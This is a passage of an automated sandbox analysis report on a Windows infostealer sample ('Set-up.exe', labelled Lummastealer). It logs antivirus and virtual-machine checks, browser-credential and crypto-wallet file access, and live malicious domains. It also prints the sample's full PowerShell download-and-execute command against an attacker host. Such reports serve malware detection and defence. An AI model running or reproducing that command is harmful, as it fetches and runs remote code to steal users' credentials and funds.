              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4048 | Thread sleep count: 2904 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984 | Thread sleep count: 474 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\find.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: PU6S498VOPMOZVY2Y7.exe.0.dr | Binary or memory string: puQEMus
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.0000000000601000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000002.2012900321.00000000009FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000002.2012900321.00000000009FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: C:\Users\user\Desktop\Set-up.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_0221039B mov edx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_0221095B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_02210FAB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_02210FAA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_02210D0B mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | NtQuerySystemInformation: Direct from: 0x4585B0
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp | Process created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp | Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; (a
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
              Source: C:\Users\user\Desktop\Set-up.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2a993b7e VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | Code function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
              Source: C:\Users\user\Desktop\Set-up.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: find.exe, 0000001B.00000002.2392963390.000001FB819D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgui.exe
              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Windows\System32\find.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: gxmgs/Electrum-LTC_^_
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s/ElectronCash_
              Source: Set-up.exe | String found in binary or memory: Jaxx Liberty
              Source: Set-up.exe | String found in binary or memory: ExodusWeb3
              Source: Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\Set-up.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Set-up.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
              Source: Yara match | File source: 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 221 Virtualization/Sandbox Evasion | LSASS Memory | 521 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 221 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 4 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 11 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 224 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              [Behavior graph (image not reproduced): Behavior Graph ID: 1584522, Sample: Set-up.exe, Startdate: 05/01/2025, Architecture: WINDOWS, Score: 100]
              [Process chain shown in the graph: Set-up.exe -> PU6S498VOPMOZVY2Y7.exe -> PU6S498VOPMOZVY2Y7.tmp -> PU6S498VOPMOZVY2Y7.exe -> PU6S498VOPMOZVY2Y7.tmp -> BrightLib.exe, cmd.exe and other processes; Set-up.exe -> powershell.exe -> conhost.exe]

              Source | Detection | Scanner | Label | Link
              Set-up.exe | 18% | ReversingLabs | Win32.Trojan.Generic |
              Set-up.exe | 17% | Virustotal | | Browse

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe | 74% | ReversingLabs | Win32.Spyware.Lummastealer |
              C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | |
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-1H7IE.tmp | 8% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://cellardesiresso.sbs/api | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apipi | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apiD | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apiod | 0% | Avira URL Cloud | safe |
              http://michaeluno.jp/4 | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apiQ | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/bu | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apiaFP | 0% | Avira URL Cloud | safe |
              https://cegu.shop/8574262446/ph.txts | 100% | Avira URL Cloud | malware |
              https://klipvumisui.shop/int_clp_sha.txts; | 100% | Avira URL Cloud | malware |
              https://cellardesiresso.sbs/ | 0% | Avira URL Cloud | safe |
              https://klipvumisui.shop/int_clp_sha.txt8 | 100% | Avira URL Cloud | malware |
              https://dfgh.online/invoker.php?compName=hZ | 100% | Avira URL Cloud | malware |
              https://cellardesiresso.sbs/1 | 0% | Avira URL Cloud | safe |
              cellardesiresso.sbs | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs:443/api | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/apiay | 0% | Avira URL Cloud | safe |
              http://michaeluno.jp/h | 0% | Avira URL Cloud | safe |
              https://cellardesiresso.sbs/piw | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cegu.shop | 185.161.251.21 | true | false | | high
              cellardesiresso.sbs | 104.21.87.8 | true | true | | unknown
              klipvumisui.shop | 172.67.208.58 | true | false | | high

              Name | Malicious | Antivirus Detection | Reputation
              rabidcowse.shop | false | | high
              https://cellardesiresso.sbs/api | true | Avira URL Cloud: safe | unknown
              cloudewahsj.shop | false | | high
              nearycrepso.shop | false | | high
              abruptyopsn.shop | false | | high
              https://klipvumisui.shop/int_clp_sha.txt | false | | high
              wholersorie.shop | false | | high
              noisycuttej.shop | false | | high
              https://cegu.shop/8574262446/ph.txt | false | | high
              cellardesiresso.sbs | true | Avira URL Cloud: safe | unknown
              framekgirus.shop | false | | high
              Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                https://cegu.shop/8574262446/ph.txtsSet-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://cellardesiresso.sbs/Set-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1976966783.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820887982.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820837451.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.symauth.com/rpa00Set-up.exefalse
                                                                                                  high
                                                                                                  https://support.microsofSet-up.exe, 00000000.00000003.1806234531.000000000351E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                      high
                                                                                                      http://www.info-zip.org/BrightLib.exe, 00000024.00000002.2524483851.0000000039BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cellardesiresso.sbs/1Set-up.exe, 00000000.00000003.1848683758.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://klipvumisui.shop/int_clp_sha.txt8Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://ocsp.securetrust.com/0?Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                          high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://dfgh.online/invoker.php?compName=hZpowershell.exe, 00000002.00000002.1903649032.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://repository.certum.pl/cscasha2.cer0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                              high
                                                                                                              http://ocsp.sectigo.com0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                high
                                                                                                                http://ocsp.vikingcloud.com/0ASet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                  high
                                                                                                                  http://certs.securetrust.com/issuers/TWGCA.crt0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                    high
                                                                                                                    http://ocsp.vikingcloud.com/0:Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                      high
                                                                                                                      http://michaeluno.jp/hBrightLib.exe, 00000024.00000002.2500321034.0000000003218000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://dfgh.online/invoker.php?compName=powershell.exe, 00000002.00000002.1902724955.00000000006FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://cellardesiresso.sbs:443/apiSet-up.exe, Set-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855564211.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0Set-up.exefalse
                                                                                                                              high
                                                                                                                              http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crt.sectigo.com/SectigPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
